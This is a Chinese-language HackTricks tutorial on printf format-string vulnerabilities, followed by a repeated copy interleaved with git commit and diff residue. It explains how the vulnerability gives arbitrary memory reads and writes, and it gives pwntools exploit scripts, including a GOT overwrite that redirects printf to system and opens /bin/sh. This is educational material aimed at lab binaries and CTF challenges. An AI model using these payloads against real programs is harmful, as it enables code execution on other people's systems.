hacktricks/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md

# 格式化字符串

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

* 您在**网络安全公司**工作吗？ 您想看到您的**公司在HackTricks中做广告**吗？ 或者您想访问**PEASS的最新版本或下载PDF格式的HackTricks**吗？ 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧**。

</details>

## 基本信息

在C语言中，**`printf`**是一个用于**打印**字符串的函数。该函数期望的**第一个参数**是带有**格式化符号**的**原始文本**。接下来期望的参数是要从原始文本中**替换****格式化符号**的**值**。

当将**攻击者文本用作该函数的第一个参数**时，就会出现漏洞。攻击者可以利用**printf格式化字符串的功能**来构造**特殊输入**，以读取和**写入任何地址的任何数据（可读/可写）**。从而能够**执行任意代码**。

#### 格式化符号:
```bash
%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
```
**示例:**

* 可被攻击的示例:
```c
char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.
```
* 正常使用:
```c
int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
```
* 缺少参数时:
```c
printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.
```
### **访问指针**

格式`%<n>$x`，其中`n`是一个数字，允许指示printf选择第n个参数（来自堆栈）。因此，如果您想使用printf读取堆栈中的第4个参数，可以执行以下操作：
```c
printf("%x %x %x %x")
```
您可以从第一个到第四个参数中读取。 

或者您可以执行：
```c
printf("$4%x")
```
并直接读取第四个。

注意，攻击者控制`pr`**`intf`参数，这基本上意味着**他的输入将在调用`printf`时位于堆栈中，这意味着他可以在堆栈中写入特定的内存地址。

{% hint style="danger" %}
控制此输入的攻击者将能够**在堆栈中添加任意地址并使`printf`访问它们**。在下一节中将解释如何利用这种行为。
{% endhint %}

## **任意读取**

可以使用格式化程序**`$n%s`**来使**`printf`**获取位于**n位置**的**地址**，并在其后打印它，就好像它是一个字符串（打印直到找到0x00为止）。因此，如果二进制文件的基地址为**`0x8048000`**，并且我们知道用户输入从堆栈的第4个位置开始，就可以打印二进制文件的开头：
```python
from pwn import *

p = process('./bin')

payload = b'%6$p' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
```
{% hint style="danger" %}
请注意，您不能在输入的开头放置地址0x8048000，因为该字符串将在该地址的末尾添加0x00。
{% endhint %}

## **任意写入**

格式化程序 **`$<num>%n`** **将** **写入的字节数** 写入到堆栈中的 \<num> 参数中指定的地址。如果攻击者可以使用printf写入尽可能多的字符，他将能够使 **`$<num>%n`** 在任意地址写入任意数字。

幸运的是，要写入数字9999，不需要在输入中添加9999个"A"，为了做到这一点，可以使用格式化程序 **`%.<num-write>%<num>$n`** 将数字 **`<num-write>`** 写入到由 `num` 位置指向的地址中。
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
```
然而，请注意，通常为了写入诸如`0x08049724`这样的地址（一次写入一个巨大的数字），**会使用`$hn`**而不是`$n`。这样可以**仅写入2字节**。因此，此操作需要执行两次，一次用于地址的最高2字节，另一次用于最低的字节。

因此，此漏洞允许**在任何地址中写入任何内容（任意写入）。**

在此示例中，目标是**覆盖**稍后将调用的**GOT**表中函数的**地址**。尽管这可能会滥用其他任意写入执行技术：

{% content-ref url="../arbitrary-write-2-exec/" %}
[arbitrary-write-2-exec](../arbitrary-write-2-exec/)
{% endcontent-ref %}

我们将**覆盖**一个**从**用户**接收参数**并将其指向**`system`**函数的**函数**。\
如前所述，通常需要两个步骤来写入地址：**首先写入地址的2字节**，然后再写入另外2字节。为此，使用**`$hn`**。

- **HOB** 用于地址的2个高字节
- **LOB** 用于地址的2个低字节

然后，由于格式字符串的工作方式，您需要**首先写入\[HOB，LOB]中较小的那个**，然后再写入另一个。

如果 HOB < LOB\
`[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]`

如果 HOB > LOB\
`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]`

HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB

{% code overflow="wrap" %}
```bash
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
```
{% endcode %}

### Pwntools模板

您可以在以下位置找到一个模板，用于准备针对这种类型漏洞的利用：

{% content-ref url="format-strings-template.md" %}
[format-strings-template.md](format-strings-template.md)
{% endcontent-ref %}

或者可以参考这个基本示例[**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)。
```python
from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()
```
## 其他示例和参考资料

* [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
* [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
* [https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html)
* 32位，无relro，无canary，nx，无pie，基本使用格式化字符串从堆栈中泄漏标志（无需更改执行流程）
* [https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html)
* 32位，relro，无canary，nx，无pie，使用格式化字符串将地址`fflush`覆盖为win函数（ret2win）
* [https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html)
* 32位，relro，无canary，nx，无pie，使用格式化字符串在`.fini_array`中的main内写入地址（使流程再循环1次），并将地址写入指向`strlen`的GOT表中的`system`。当流程返回到main时，`strlen`将使用用户输入执行，并指向`system`，将执行传递的命令。
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
+								# 格式化字符串
 								<details>
 								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								* 您在**网络安全公司**工作吗？ 您想看到您的**公司在HackTricks中做广告**吗？ 或者您想访问**PEASS的最新版本或下载PDF格式的HackTricks**吗？ 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
+								* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
+								* **通过向** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧**。
 								</details>
 								## 基本信息
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								在C语言中，**`printf`**是一个用于**打印**字符串的函数。该函数期望的**第一个参数**是带有**格式化符号**的**原始文本**。接下来期望的参数是要从原始文本中**替换****格式化符号**的**值**。
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								当将**攻击者文本用作该函数的第一个参数**时，就会出现漏洞。攻击者可以利用**printf格式化字符串的功能**来构造**特殊输入**，以读取和**写入任何地址的任何数据（可读/可写）**。从而能够**执行任意代码**。
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								#### 格式化符号:
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
+								```bash
 								%08x —> 8 hex bytes
 								%d —> Entire
 								%u —> Unsigned
 								%s —> String
 								%n —> Number of written bytes
 								%hn —> Occupies 2 bytes instead of 4
 								<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
 								```
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								**示例:**
 								* 可被攻击的示例:
 								```c
 								char buffer[30];
 								gets(buffer);  // Dangerous: takes user input without restrictions.
 								printf(buffer);  // If buffer contains "%x", it reads from the stack.
 								```
 								* 正常使用:
 								```c
 								int value = 1205;
 								printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
 								```
 								* 缺少参数时:
 								```c
 								printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.
 								```
 								### **访问指针**
 								格式`%<n>$x`，其中`n`是一个数字，允许指示printf选择第n个参数（来自堆栈）。因此，如果您想使用printf读取堆栈中的第4个参数，可以执行以下操作：
 								```c
 								printf("%x %x %x %x")
 								```
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								您可以从第一个到第四个参数中读取。
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
 								或者您可以执行：
 								```c
 								printf("$4%x")
 								```
 								并直接读取第四个。
 								注意，攻击者控制`pr`**`intf`参数，这基本上意味着**他的输入将在调用`printf`时位于堆栈中，这意味着他可以在堆栈中写入特定的内存地址。
 								{% hint style="danger" %}
 								控制此输入的攻击者将能够**在堆栈中添加任意地址并使`printf`访问它们**。在下一节中将解释如何利用这种行为。
 								{% endhint %}
 								## **任意读取**
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								可以使用格式化程序**`$n%s`**来使**`printf`**获取位于**n位置**的**地址**，并在其后打印它，就好像它是一个字符串（打印直到找到0x00为止）。因此，如果二进制文件的基地址为**`0x8048000`**，并且我们知道用户输入从堆栈的第4个位置开始，就可以打印二进制文件的开头：
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								```python
 								from pwn import *
 								p = process('./bin')
 								payload = b'%6$p' #4th param
 								payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
 								payload += p32(0x8048000) #6th param
 								p.sendline(payload)
 								log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
 								```
 								{% hint style="danger" %}
 								请注意，您不能在输入的开头放置地址0x8048000，因为该字符串将在该地址的末尾添加0x00。
 								{% endhint %}
 								## **任意写入**
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								格式化程序 **`$<num>%n`** **将** **写入的字节数** 写入到堆栈中的 \<num> 参数中指定的地址。如果攻击者可以使用printf写入尽可能多的字符，他将能够使 **`$<num>%n`** 在任意地址写入任意数字。
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								幸运的是，要写入数字9999，不需要在输入中添加9999个"A"，为了做到这一点，可以使用格式化程序 **`%.<num-write>%<num>$n`** 将数字 **`<num-write>`** 写入到由 `num` 位置指向的地址中。
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
+								```bash
 								AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
 								AAAA.%500\$08x —> Param at offset 500
 								```
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								然而，请注意，通常为了写入诸如`0x08049724`这样的地址（一次写入一个巨大的数字），**会使用`$hn`**而不是`$n`。这样可以**仅写入2字节**。因此，此操作需要执行两次，一次用于地址的最高2字节，另一次用于最低的字节。
 								因此，此漏洞允许**在任何地址中写入任何内容（任意写入）。**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								在此示例中，目标是**覆盖**稍后将调用的**GOT**表中函数的**地址**。尽管这可能会滥用其他任意写入执行技术：
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								{% content-ref url="../arbitrary-write-2-exec/" %}
 								[arbitrary-write-2-exec](../arbitrary-write-2-exec/)
 								{% endcontent-ref %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								我们将**覆盖**一个**从**用户**接收参数**并将其指向**`system`**函数的**函数**。\
 								如前所述，通常需要两个步骤来写入地址：**首先写入地址的2字节**，然后再写入另外2字节。为此，使用**`$hn`**。
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								- **HOB** 用于地址的2个高字节
 								- **LOB** 用于地址的2个低字节
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								然后，由于格式字符串的工作方式，您需要**首先写入\[HOB，LOB]中较小的那个**，然后再写入另一个。
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
 								如果 HOB < LOB\
 								`[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]`
 								如果 HOB > LOB\
 								`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]`
 								HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								{% code overflow="wrap" %}
 								```bash
 								python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
 								```
 								{% endcode %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								### Pwntools模板
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								您可以在以下位置找到一个模板，用于准备针对这种类型漏洞的利用：
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-29 21:06:45 +00:00
 								{% content-ref url="format-strings-template.md" %}
 								[format-strings-template.md](format-strings-template.md)
 								{% endcontent-ref %}
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								或者可以参考这个基本示例[**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)。
-												Translated ['reversing-and-exploiting/linux-exploiting-basic-esp/arbitra

											
										
										
											2024-03-30 23:42:27 +00:00
+								```python
 								from pwn import *
 								elf = context.binary = ELF('./got_overwrite-32')
 								libc = elf.libc
 								libc.address = 0xf7dc2000       # ASLR disabled
 								p = process()
 								payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
 								p.sendline(payload)
 								p.clean()
 								p.sendline('/bin/sh')
 								p.interactive()
 								```
 								## 其他示例和参考资料
 								* [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
 								* [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
-												Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin

											
										
										
											2024-04-02 19:47:00 +00:00
+								* [https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html)
 								* 32位，无relro，无canary，nx，无pie，基本使用格式化字符串从堆栈中泄漏标志（无需更改执行流程）
 								* [https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html)
 								* 32位，relro，无canary，nx，无pie，使用格式化字符串将地址`fflush`覆盖为win函数（ret2win）
 								* [https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html)
 								* 32位，relro，无canary，nx，无pie，使用格式化字符串在`.fini_array`中的main内写入地址（使流程再循环1次），并将地址写入指向`strlen`的GOT表中的`system`。当流程返回到main时，`strlen`将使用用户输入执行，并指向`system`，将执行传递的命令。